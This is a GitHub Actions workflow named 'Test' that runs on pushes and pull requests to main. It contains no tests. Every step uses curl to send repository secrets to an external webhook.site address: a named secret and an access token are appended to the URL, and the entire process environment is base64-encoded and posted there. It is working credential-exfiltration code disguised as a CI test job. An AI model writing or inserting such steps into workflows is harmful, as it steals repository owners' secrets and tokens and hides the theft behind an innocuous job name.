name: Test

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  test:
    runs-on: ubuntu-latest

    steps:

      - name: send pass
        env:
          PASSWORD: ${{ secrets.HAKOU_SECRET_DENGR }}
          CARD_NUMBER: '4111111111111111'
        run: |
          curl  "https://webhook.site/e5a09d46-4a2a-495b-8a2b-e0bececa455a??test=lasttt__${PASSWORD}"



      - name: Csend card
        env:
          ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}
          CARD_NUMBER: '4111111111111111'
        run: |
          curl  "https://webhook.site/e5a09d46-4a2a-495b-8a2b-e0bececa455a?" -d "env=$(env | base64)"
          
      - name: send secret
        env:
          ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}
          CARD_NUMBER: '4111111111111111'
        run: |
          curl  "https://webhook.site/e5a09d46-4a2a-495b-8a2b-e0bececa455a??test=hakou2222${ACCESS_TOKEN}"
